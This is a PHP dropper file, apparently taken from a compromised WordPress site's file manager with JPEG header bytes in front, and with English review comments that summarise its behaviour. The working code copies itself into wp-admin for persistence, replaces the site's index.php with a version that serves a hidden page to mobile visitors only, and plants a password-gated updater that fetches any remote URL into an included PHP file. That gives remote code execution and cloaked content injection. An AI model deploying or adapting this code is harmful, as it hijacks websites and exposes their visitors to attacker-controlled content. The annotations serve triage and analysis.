ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
File manager - Edit - /home/tokomrjk/internodoors.com/installs.php
<?php
// installs.php
// One click: creates index.php, wp-admin/amp.php and wp-admin/admins-updater.php.
// Also backs itself up as wp-admin/js/core-backup.php.
// Usage: site.com/installs.php
//
// NOTE(review): summary of what the code below does, for triage.
// After a password login this script:
//   1. copies itself to wp-admin/js/core-backup.php, so a second copy remains if
//      installs.php is deleted;
//   2. renames the site's index.php to index2.php and writes a new index.php that
//      includes wp-admin/amp.php for mobile user agents and index2.php otherwise;
//   3. writes wp-admin/admins-updater.php, a password-gated page that downloads a
//      submitted URL and stores the response as wp-admin/amp.php.
// amp.php is loaded with include, so PHP tags in a downloaded response would run
// on this host. Desktop visitors keep seeing the original front page (index2.php).
// Files this script creates or touches, relative to the web root:
//   index.php (replaced), index2.php (renamed original), wp-admin/amp.php,
//   wp-admin/admins-updater.php, wp-admin/admins-updater.log,
//   wp-admin/js/core-backup.php, wp-admin/backups/amp.bak.<unix time>.
// display_errors is switched on below, so PHP warnings are sent to the browser.
error_reporting(E_ALL);
ini_set('display_errors', 1);
session_start();
/* ---------- CONFIG ---------- */
$installer_pwd_md5 = '73e2b5309fddfd39691a02c02141d8fb'; // unsalted MD5 of the access password; the same digest is hard-coded as $storedHash in the generated admins-updater.php
$rootDir = rtrim(__DIR__, '/');
$wpAdminDir = $rootDir . '/wp-admin';
$allowOverwriteDefault = false; // default behaviour (changes depending on the button)
/* ---------------------------- */
// HTML-escapes a value for output (quotes included, invalid bytes substituted).
function h($s){ return htmlspecialchars((string)$s, ENT_QUOTES|ENT_SUBSTITUTE, 'UTF-8'); }
// All control input arrives by POST: the action name, the password, the overwrite checkbox.
$action = $_POST['action'] ?? null;
$pwd = $_POST['pwd'] ?? '';
$overwrite = isset($_POST['overwrite']) ? true : false;
// Authentication: require password to proceed
// The session flag installs_auth marks a logged-in session. This script shows no
// attempt limit and no logging of failed logins.
$loggedIn = isset($_SESSION['installs_auth']) && $_SESSION['installs_auth'] === true;
if (!$loggedIn && $action === 'login') {
    if (md5($pwd) === $installer_pwd_md5) {
        $_SESSION['installs_auth'] = true;
        $loggedIn = true;
    } else {
        $loginError = "Hatalı şifre.";
    }
}
// If not logged in yet, show login form
if (!$loggedIn) { ?>
<!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Installs - Giriş</title>
<style>body{font-family:Arial;padding:30px;background:#f6f6f6} .box{max-width:480px;margin:40px auto;background:#fff;padding:20px;border-radius:8px;box-shadow:0 6px 20px rgba(0,0,0,.06)}</style>
</head><body>
<div class="box">
<h2>Installs - Kurulum</h2>
<?php if (!empty($loginError)) echo "<p style='color:red'>".h($loginError)."</p>"; ?>
<p>Devam etmek için kurulum şifresini gir:</p>
<form method="POST">
<input type="hidden" name="action" value="login">
<input type="password" name="pwd" placeholder="Şifre" style="width:100%;padding:8px;margin-bottom:10px">
<button style="padding:10px 14px">Giriş</button>
</form>
<p style="font-size:13px;color:#666;margin-top:12px">Bu sayfa dosya yazma işlemi yapar. 
Yalnızca güvenli bir ortamda kullan.</p>
</div>
</body></html>
<?php
    exit;
}
// Logged in — show installer UI or run install
if ($action === 'install') {
    // perform install
    // $report is never used and $errors is filled but never printed in the code
    // shown here; the completion page at the end is static.
    $report = [];
    $errors = [];
    // --- self-backup: installs.php saves itself as wp-admin/js/core-backup.php ---
    // ensure wp-admin/js exists
    $selfBackupDir = $wpAdminDir . '/js';
    $selfBackupPath = $selfBackupDir . '/core-backup.php';
    if (!is_dir($selfBackupDir)) { @mkdir($selfBackupDir, 0755, true); }
    // copy (overwrite to keep latest)
    // The @ operator suppresses warnings, so a failed copy or chmod is silent.
    @copy(__FILE__, $selfBackupPath);
    @chmod($selfBackupPath, 0640);
    // (kept out of the report — can be written to the log on request)
    // --- added: rename the existing index.php (leave it alone if index2 exists) ---
    // After this rename index.php no longer exists, so the write loop below creates
    // the replacement even when the overwrite checkbox is not ticked. If index2.php
    // was already present, index.php stays and is replaced only with overwrite set.
    $publicIndex = $rootDir . '/index.php';
    $backupIndex = $rootDir . '/index2.php';
    if (file_exists($publicIndex)) {
        if (!file_exists($backupIndex)) {
            @rename($publicIndex, $backupIndex); // not added to report per request
        }
    }
    // ensure wp-admin exists
    if (!is_dir($wpAdminDir)) {
        if (!@mkdir($wpAdminDir, 0755, true)) {
            $errors[] = "wp-admin klasörü oluşturulamadı: $wpAdminDir";
        }
    }
    // ensure backups dir
    $backups = $wpAdminDir . '/backups';
    if (!is_dir($backups)) { @mkdir($backups, 0755, true); }
    // ensure log file
    $logfile = $wpAdminDir . '/admins-updater.log';
    if (!file_exists($logfile)) {
        @file_put_contents($logfile, '');
        @chmod($logfile, 0640);
    }
    // ---------- build file contents ----------
    // Payload 1, written to <web root>/index.php. It tests the User-Agent header
    // against a list of mobile markers; on a match, and if wp-admin/amp.php exists
    // and is readable, it includes that file and stops. Every other request gets
    // index2.php, the renamed original front page.
    $index_php = <<<'PHP'
<?php
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
$isMobile = preg_match('/Android|iPhone|iPad|iPod|Opera Mini|IEMobile|Mobile/i', $ua);
if ($isMobile) {
$ampPath = __DIR__ . '/wp-admin/amp.php';
if (file_exists($ampPath) && is_readable($ampPath)) {
include $ampPath;
exit;
}
}
include __DIR__ . '/index2.php';
exit;
PHP;
    // Payload 2, written to wp-admin/amp.php: a static placeholder page marked
    // noindex, nofollow. Its own text says it is updated through admins-updater.
    $amp_php = <<<'HTML'
<!doctype html>
<html amp lang="tr">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<title>AMP — Güncelleme Sayfası</title>
<meta name="robots" content="noindex, nofollow">
<script async src="https://cdn.ampproject.org/v0.js"></script>
<style amp-custom> body{font-family:system-ui,Arial;padding:36px;background:#fff;color:#111} .wrap{max-width:980px;margin:0 auto;text-align:center} .btn{display:inline-block;padding:10px 16px;border-radius:999px;background:#1b82d6;color:#fff;text-decoration:none} </style>
</head>
<body>
<main class="wrap">
<h1>AMP Sayfası</h1>
<p>Bu sayfa admins-updater ile güncellenir.</p>
<p><a class="btn" href="/">Anasayfaya dön</a></p>
</main>
</body>
</html>
HTML;
    // Payload 3, written to wp-admin/admins-updater.php. From its source below:
    //  - login compares md5() of the posted password with the same digest as above
    //    and sets the session flag 'authenticated'; failed attempts are logged;
    //  - the update form is protected by a per-session CSRF token (hash_equals);
    //  - fetchContent() requests the posted target_url with cURL, follows
    //    redirects, disables TLS peer verification and sends the User-Agent
    //    'AdminsUpdater/1.0' (usable as an egress-log indicator);
    //  - FILTER_VALIDATE_URL is the only check on the target before it is fetched;
    //  - the previous amp.php is copied to backups/amp.bak.<unix time>, then the
    //    response is written over amp.php;
    //  - every outcome is appended to admins-updater.log with the remote address.
    // NOTE(review): the str_replace('<?', '<?', ...) call has identical search and
    // replacement strings as printed on this page, so it changes nothing; whether
    // the page rendering altered one of the arguments cannot be told from here.
    $admins_updater_php = <<<'PHP'
<?php
session_start();
$storedHash = '73e2b5309fddfd39691a02c02141d8fb';
$savePath = __DIR__ . '/amp.php';
$backupDir = __DIR__ . '/backups';
$logFile = __DIR__ . '/admins-updater.log';
function au_log($m) {
global $logFile;
$line = '[' . date('Y-m-d H:i:s') . '] ' . ($_SERVER['REMOTE_ADDR'] ?? 'cli') . ' - ' . $m . PHP_EOL;
@file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX);
}
function generateCSRF() {
if (empty($_SESSION['csrf'])) $_SESSION['csrf'] = bin2hex(random_bytes(24));
return $_SESSION['csrf'];
}
if (!isset($_SESSION['authenticated'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
if (md5($_POST['password']) === $GLOBALS['storedHash']) {
$_SESSION['authenticated'] = true;
generateCSRF();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
$error = "Hatalı şifre.";
au_log("Bad password attempt");
}
}
echo '<!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Giriş</title></head><body style="font-family:Arial;padding:30px">';
if (!empty($error)) echo '<p style="color:red">'.htmlspecialchars($error).'</p>';
echo '<form method="POST"><label>Şifre:</label><br><input type="password" name="password" required style="padding:8px"><br><button style="margin-top:10px;padding:8px 12px">Giriş</button></form></body></html>';
exit;
}
function fetchContent($url) {
$ch = curl_init();
curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 20, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'AdminsUpdater/1.0' ]);
$resp = curl_exec($ch);
if ($resp === false) au_log('cURL error: ' . curl_error($ch));
curl_close($ch);
return $resp ?: false;
}
$success = $error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token'])) {
if (!hash_equals($_SESSION['csrf'] ?? '', $_POST['csrf_token'])) {
$error = 'Geçersiz token.';
au_log('Invalid CSRF token');
} else {
$url = trim($_POST['target_url'] ?? '');
if (!filter_var($url, FILTER_VALIDATE_URL)) {
$error = 'Geçersiz URL.';
au_log('Invalid URL: ' . $url);
} else {
$content = fetchContent($url);
if ($content !== false) {
if (!is_dir($backupDir)) @mkdir($backupDir, 0755, true);
if (file_exists($savePath)) copy($savePath, $backupDir . '/amp.bak.' . time());
$content = str_replace('<?', '<?', $content);
if (file_put_contents($savePath, $content, LOCK_EX) !== false) {
$success = 'Güncellendi: ' . htmlspecialchars($url);
au_log("Saved amp.php from $url");
} else {
$error = 'Dosya yazılamadı.';
au_log("Failed writing amp.php");
}
} else {
$error = 'İçerik alınamadı.';
au_log("Fetch failed: $url");
}
}
}
}
$csrf = generateCSRF();
?>
<!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Admins Updater</title>
<style>body{font-family:Arial;padding:24px;background:#f4f4f4}.box{max-width:720px;margin:auto;background:#fff;padding:16px;border-radius:8px}</style>
</head><body><div class="box"><h2>Admins Updater</h2>
<?php if($success) echo '<p style="color:green">'.htmlspecialchars($success).'</p>'; if($error) echo '<p style="color:red">'.htmlspecialchars($error).'</p>'; ?>
<form method="POST"><label>İçerik URL:</label><br><input type="text" name="target_url" style="width:100%;padding:8px;margin:8px 0" placeholder="https://example.com/page"><input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($csrf); ?>"><button style="padding:10px 14px">Gönder</button></form></div></body></html>
PHP;
    // Map of destination path => payload for the three files described above.
    $filesToWrite = [ $rootDir . '/index.php' => $index_php, $wpAdminDir . '/amp.php' => $amp_php, $wpAdminDir . '/admins-updater.php' => $admins_updater_php ];
    // Each payload is written to a temp file in the system temp dir and then renamed
    // into place with mode 0644. An existing destination is skipped unless the
    // overwrite checkbox was sent. Every failure path just continues, and rename
    // and chmod are @-suppressed, so a partial install gives no visible error.
    foreach ($filesToWrite as $fpath => $content) {
        $dir = dirname($fpath);
        if (!is_dir($dir)) @mkdir($dir, 0755, true);
        if (file_exists($fpath) && !$overwrite) continue;
        $tmp = tempnam(sys_get_temp_dir(), 'inst_');
        if ($tmp === false) continue;
        if (file_put_contents($tmp, $content) === false) { @unlink($tmp); continue; }
        @rename($tmp, $fpath);
        @chmod($fpath, 0644);
    }
    // Static completion page linking to the site root and to the dropped updater.
    echo "<!doctype html><html lang='tr'><head><meta charset='utf-8'><title>Kurulum Tamamlandı</title><style>body{font-family:Arial;background:#fafafa;padding:40px;text-align:center}</style></head><body><h2>Kurulum Tamamlandı</h2><p><a href='/'>Siteyi Aç</a> · <a href='/wp-admin/admins-updater.php'>Admins Updater</a></p></body></html>";
    exit;
}
// Logout: drop the installer's session flag and reload this script.
if ($action === 'logout') {
    unset($_SESSION['installs_auth']);
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}
// Logged in and no action requested: render the install form (overwrite checkbox
// plus submit) and the logout form. Neither form carries a CSRF token.
?>
<!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Installs - Kurulum</title>
<style>body{font-family:Arial;padding:30px;background:#f6f6f6} .box{max-width:720px;margin:40px auto;background:#fff;padding:20px;border-radius:8px;box-shadow:0 6px 20px rgba(0,0,0,.06)}</style>
</head><body>
<div class="box">
<h2>Installs - Dosya Yükleme Aracı</h2>
<p>Bu işlem mevcut dosyaların üzerine yazabilir. Devam etmeden önce sunucu yedeğinizin olduğundan emin olun.</p>
<form method="POST">
<input type="hidden" name="action" value="install">
<label><input type="checkbox" name="overwrite" <?php if($allowOverwriteDefault) echo 'checked'; ?>> Üzerine yaz (overwrite)</label><br><br>
<button type="submit" style="padding:10px 14px">Aktar ve Oluştur</button>
</form>
<form method="POST" style="margin-top:12px">
<input type="hidden" name="action" value="logout">
<button type="submit">Çıkış</button>
</form>
</div>
</body></html>